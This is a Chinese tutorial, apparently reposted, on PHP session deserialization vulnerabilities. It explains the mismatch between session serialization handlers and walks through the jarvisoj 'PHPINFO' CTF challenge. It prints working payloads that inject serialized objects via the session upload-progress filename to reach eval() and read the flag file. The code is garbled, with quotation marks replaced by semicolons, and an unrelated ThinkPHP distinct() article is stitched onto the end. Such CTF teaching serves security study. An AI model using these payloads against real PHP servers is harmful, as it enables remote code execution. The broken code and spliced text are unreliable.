详细介绍PHP的session反序列化漏洞

本篇文章给大家带来了关于PHP的相关知识,其中主要介绍了关于session反序列化漏洞的相关问题,就是序列化存储Session数据与反序列化读取Session数据的方式不同导致Session反序列化漏洞,希望对大家有帮助。

本篇文章给大家带来了关于PHP的相关知识,其中主要介绍了关于session反序列化漏洞的相关问题,就是序列化存储Session数据与反序列化读取Session数据的方式不同导致Session反序列化漏洞,希望对大家有帮助。

详细介绍PHP的session反序列化漏洞

php零基础到就业直播视频课:进入学习程序员必备接口测试调试工具:立即使用

PHP session反序列化漏洞

PHP session反序列化漏洞,就是当【序列化存储Session数据】与【反序列化读取Session数据】的方式不同导致session反序列化漏洞的产生

什么是session

官方Session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置信息。主要有以下特点:

  • session保存的位置是在服务器端
  • session通常是要配合cookie使用

因为HTTP的无状态性,服务端产生了session来标识当前的用户状态

本质上,session就是一种可以维持服务器端的数据存储技术。即**session技术就是一种基于后端有别于数据库的临时存储数据的技术**

PHP session工作流程

以PHP为例,理解session的原理

  • PHP脚本使用 session_start()时开启session会话,会自动检测PHPSESSID
    • 如果Cookie中存在,获取PHPSESSID
    • 如果Cookie中不存在,创建一个PHPSESSID,并通过响应头以Cookie形式保存到浏览器
  • 初始化超全局变量$_SESSION为一个空数组
  • PHP通过PHPSESSID去指定位置(PHPSESSID文件存储位置)匹配对应的文件
    • 存在该文件:读取文件内容(通过反序列化方式),将数据存储到$_SESSION中
    • 不存在该文件: session_start()创建一个PHPSESSID命名文件
  • 程序执行结束,将$_SESSION中保存的所有数据序列化存储到PHPSESSID对应的文件中
  • 具体原理图:

    详细介绍PHP的session反序列化漏洞

    php.ini session配置

    php.ini里面有较重要的session配置项

    session.save_path=;/tmp; –设置session文件的存储位置
    session.save_handler=files –设定用户自定义存储函数,如果想使用PHP内置session存储机制之外的可以使用这个函数
    session.auto_start= 0 –指定会话模块是否在请求开始时启动一个会话,默认值为 0,不启动
    session.serialize_handler= php –定义用来序列化/反序列化的处理器名字,默认使用php
    session.upload_progress.enabled= On –启用上传进度跟踪,并填充$ _SESSION变量,默认启用
    session.upload_progress.cleanup= oN –读取所有POST数据(即完成上传)后立即清理进度信息,默认启用PHP session序列化机制

    根据php.ini中的配置项,我们研究将$_SESSION中保存的所有数据序列化存储到PHPSESSID对应的文件中,使用的三种不同的处理格式,即session.serialize_handler定义的三种引擎:

    处理器对应的存储格式
    php 键名 + 竖线 + 经过 serialize() 函数反序列处理的值
    php_binary 键名的长度对应的 ASCII 字符 + 键名 + 经过 serialize() 函数反序列处理的值
    php_serialize (php>=5.5.4) 经过 serialize() 函数反序列处理的数组

    php处理器

    首先来看看默认session.serialize_handler = php时候的序列化结果,代码如下

    <?php//ini_set(;session.serialize_handler;,;php;);session_start();$_SESSION[;name;] = $_GET[;name;];echo $_SESSION[;name;];?>

    详细介绍PHP的session反序列化漏洞

    为了方便查看,将session存储目录设置为session.save_path = ;/www/php_session; ,PHPSESSID文件如下

    详细介绍PHP的session反序列化漏洞

    1、文件名

    文件名为sess_mpnnbont606f50eb178na451od,其中mpnnbont606f50eb178na451od就是后续请求头中Cookie携带的PHPSESSID的值 (如上图浏览器中已存储)

    2、文件内容

    php处理器存储格式

    键名竖线经过 serialize() 函数反序列处理的值
    $_SESSION[‘name’]的键名:name | s:6:“harden”;

    php_binary处理器

    使用php_binary处理器,即session.serialize_handler = php_binary

    <?phpini_set(;session.serialize_handler;,;php_binary;);session_start();# 为了方便ACSII显示,将键名设置为36个字符长度$_SESSION[;namenamenamenamenamenamenamenamename;] = $_GET[;name;];echo $_SESSION[;namenamenamenamenamenamenamenamename;];?>

    由于三种方式PHPSESSID文件名都是一样的,这里只需要查看文件内容

    详细介绍PHP的session反序列化漏洞

    键名的长度对应的 ASCII 字符键名经过 serialize() 函数反序列处理的值.
    $ namenamenamenamenamenamenamenamename s:6:“harden”;

    php_serialize 处理器

    使用php_binary处理器,即session.serialize_handler = php_serialize

    <?phpini_set(;session.serialize_handler;,;php_serialize;);session_start();$_SESSION[;name;] = $_GET[;name;];echo $_SESSION[;name;];?>

    文件内容即经过 serialize() 函数反序列处理的数组,a:1:{s:4:;name;;s:6:;harden;;}

    详细介绍PHP的session反序列化漏洞

    session的反序列化漏洞利用

    session的反序列化漏洞,就是利用php处理器和php_serialize处理器的存储格式差异而产生,通过具体的代码我们来看下漏洞出现的原因

    漏洞成因

    首先创建session.php,使用php_serialize处理器来存储session数据

    <?phpini_set(;session.serialize_handler;,;php_serialize;);session_start();$_SESSION[;session;] = $_GET[;session;];echo $_SESSION[;session;];?>

    test.php,使用默认php处理器来存储session数据

    <?phpsession_start();class f4ke{
    public $name;
    function __wakeup(){
    echo ;Who are you?;;
    }
    function __destruct(){
    eval($this->name);
    }}$str = new f4ke();?>

    接着,我们构建URL进行访问session.php:

    http://www.session-serialize.com/session.php?session=|O:4:;f4ke;:1:{s:4:;name;;s:10:;phpinfo();;;}

    详细介绍PHP的session反序列化漏洞

    打开PHPSESSID文件可看到序列化存储的内容

    a:1:{s:7:;session;;s:45:;|O:4:;f4ke;:1:{s:4:;name;;s:10:;phpinfo();;;}

    详细介绍PHP的session反序列化漏洞

    漏洞分析:

    在session.php程序执行,我们将|O:4:;f4ke;:1:{s:4:;name;;s:10:;phpinfo();;;}通过php_serialize处理器序列化保存成PHPSESSID文件;

    由于浏览器中保存的PHPSESSID文件名不变,当我们访问test.php,session_start();找到PHPSESSID文件并使用php处理器反序列化文件内容,识别格式即

    键名竖线经过 serialize() 函数反序列处理的值
    a:1:{s:7:“session”;s:45:; | O:4:“f4ke”:1:{s:4:“name”;s:10:“phpinfo();”;}

    php处理器会以|作为分隔符,将O:4:;f4ke;:1:{s:4:;name;;s:10:;phpinfo();;;}反序列化,就会触发__wakeup()方法,最后对象销毁执行__destruct()方法中的eval()函数,相当于执行如下:

    $_SESSION[;session;] = new f4ke();$_SESSION[;session;]->name = ;phpinfo();;;

    我们访问test.php,即可直接执行phpinfo()函数

    详细介绍PHP的session反序列化漏洞

    CTF例题:PHPINFO<?php//A webshell is wait for youini_set(;session.serialize_handler;, ;php;);session_start();class OowoO{
    public $mdzz;
    function __construct()
    {
    $this->mdzz = ;phpinfo();;;
    }

    function __destruct()
    {
    eval($this->mdzz);
    }}if(isset($_GET[;phpinfo;])){
    $m = new OowoO();}else{
    highlight_string(file_get_contents(;index.php;));}?>

    我们可以看到ini_set(;session.serialize_handler;, ;php;),判断可能存在session反序列化漏洞,根据代码逻辑,访问URL加上phpinfo参数新建对象触发魔术方法执行phpinfo()函数,进一步查看session.serialize_handler配置

    详细介绍PHP的session反序列化漏洞

    可见php.ini中session.serialize_handler = php_serialize,当前目录中被设置为session.serialize_handler = php,因此存在session反序列化利用的条件

    补充知识

    phpinfo文件中

    local value(局部变量:作用于当前目录程序,会覆盖master value内容):php
    master value(主变量:php.ini里面的内容):php_serialize

    那么我们如何找到代码入口将利用代码写入到session文件?想要写入session文件就得想办法在$_SESSION变量中增加我们可控的输入点

    补充知识

    当检测Session 上传进度这一特性是开启状态,我们可以在客户端写一个文件上传的功能,文件上传的同时,POST一个与php.ini中设置的session.upload_progress.name同名变量PHP_SESSION_UPLOAD_PROGRESS,如下图,即可写入$_SESSION,进一步序列化写入session文件

    详细介绍PHP的session反序列化漏洞

    下面是官方给出的一个文件上传时监测进度例子:

    <form action=;upload.php; method=;POST; enctype=;multipart/form-data;>
    <input type=;hidden; name=;<?php echo ini_get(;session.upload_progress.name;); ?>; value=;123; /> <input type=;file; name=;file1; />
    <input type=;file; name=;file2; />
    <input type=;submit; /></form>

    其中name=;;也可以设置为name=;PHP_SESSION_UPLOAD_PROGRESS;

    在session中存储的上传进度,如下所示:

    <?php$_SESSION[;upload_progress_123;] = array(
    ;start_time; => 1234567890, // The request time 请求时间
    ;content_length; => 57343257, // POST content length 长度
    ;bytes_processed; => 453489, // Amount of bytes received and processed 已接收字节
    ;done; => false, // true when the POST handler has finished, successfully or not 是否上传完成
    ;files; => array(//上传的文件
    0 => array(
    ;field_name; => ;file1;, // Name of the <input/> field input中设定的变量名
    // The following 3 elements equals those in $_FILES
    ;name; => ;foo.avi;, //文件名
    ;tmp_name; => ;/tmp/phpxxxxxx;,
    ;error; => 0,
    ;done; => true, // True when the POST handler has finished handling this file
    ;start_time; => 1234567890, // When this file has started to be processed
    ;bytes_processed; => 57343250, // Amount of bytes received and processed for this file
    ),
    // An other file, not finished uploading, in the same request
    1 => array(
    ;field_name; => ;file2;,
    ;name; => ;bar.avi;,
    ;tmp_name; => NULL,
    ;error; => 0,
    ;done; => false,
    ;start_time; => 1234567899,
    ;bytes_processed; => 54554,
    ),
    ));

    其中,session中的field_name和name都是我们可控的输入点!

    下面我们就开始解题拿到flag

    首先,http://web.jarvisoj.com:32784/index.php?phpinfo查询设置

    详细介绍PHP的session反序列化漏洞

    session.upload_progress.enabled = On –表明允许上传进度跟踪,并填充$ _SESSION变量
    session.upload_progress.cleanup = Off –表明所有POST数据(即完成上传)后,不清理进度信息($ _SESSION变量)

    即允许上传进度跟踪且结束后不清除数据,更有利使用session.upload_progress.name来将利用代码写入session文件

    构造POST表单提交上传文件

    <form action=;http://web.jarvisoj.com:32784/index.php; method=;POST; enctype=;multipart/form-data;>
    <input type=;hidden; name=;PHP_SESSION_UPLOAD_PROGRESS; value=;123; />
    <input type=;file; name=;file; />
    <input type=;submit; /></form>

    构造序列化字符串作为payload(利用代码)

    <?phpclass OowoO{
    public $mdzz=;print_r(scandir(dirname(__FILE__)));;;}$obj = new OowoO();echo serialize($obj);?>//O:5:;OowoO;:1:{s:4:;mdzz;;s:36:;print_r(scandir(dirname(__FILE__)));;;}

    为了防止;被转义,我们在payload中加入\

    随意选择文件,点击表单提交,使用抓包工具burpsuite抓取请求包

    详细介绍PHP的session反序列化漏洞

    并修改filename值为

    |O:5:\;OowoO\;:1:{s:4:\;mdzz\;;s:36:\;print_r(scandir(dirname(__FILE__)));\;;}

    发送请求包,代码执行过程分析:

    详细介绍PHP的session反序列化漏洞

    因此直接执行print_r(scandir(dirname(__FILE__)));并返回

    详细介绍PHP的session反序列化漏洞

    phpinfo查看当前目录,/opt/lampp/htdocs/

    详细介绍PHP的session反序列化漏洞

    构造最终payload读取Here_1s_7he_fl4g_buT_You_Cannot_see.php文件内容,即flag

    |O:5:\;OowoO\;:1:{s:4:\;mdzz\;;s:88:\;print_r(file_get_contents(\;/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\;));\;;}

    详细介绍PHP的session反序列化漏洞

    thinkphp中distinct的用法是什么

    原创2022-04-25 10:03:452473 + 加入Thinkphp讨论小组

    在thinkphp中,distinct()方法用于去除重复的值,能够返回唯一不同的值,distinct方法的参数是一个布尔值,语法为“$Model->distinct(布尔值参数)->field('name')->select();”。

    详细介绍PHP的session反序列化漏洞

    php零基础到就业直播视频课:进入学习程序员必备接口测试调试工具:立即使用

    本文操作环境:Windows10系统、ThinkPHP5版、Dell G3电脑。

    thinkphp中distinct的用法是什么

    TP中distinct()的用处主要是去除重复的值

    DISTINCT 方法用于返回唯一不同的值 。

    $Model->distinct(true)->field('name')->select();

    生成的SQL语句是:

    SELECT DISTINCT name FROM think_user

    示例如下:

    详细介绍PHP的session反序列化漏洞

    显示的是这样的

    详细介绍PHP的session反序列化漏洞

    在加入distinct的话:

    详细介绍PHP的session反序列化漏洞

    显示结果为

    详细介绍PHP的session反序列化漏洞

    下面为贴出来的代码

    $offernum = M('offer')->distinct(true)->where('order_id='.$order_id)->field('user_id,number')->select();
    dump($offernum);

    以上就是thinkphp中distinct的用法是什么的详细内容,更多请关注钦钦技术栈其它相关文章!

    转载至:php中文网【www.php.cn】

    版权声明:本文(即:原文链接:https://www.qin1qin.com/catagory/23975/)内容由互联网用户自发投稿贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 630367839@qq.com 举报,一经查实,本站将立刻删除。

    (0)
    上一篇 2022年9月20日 下午12:51
    下一篇 2022年9月20日 下午12:55
    软件定制开发公司

    相关阅读

    发表回复

    登录后才能评论
    通知:禁止投稿所有关于虚拟货币,币圈类相关文章,发现立即永久封锁账户ID!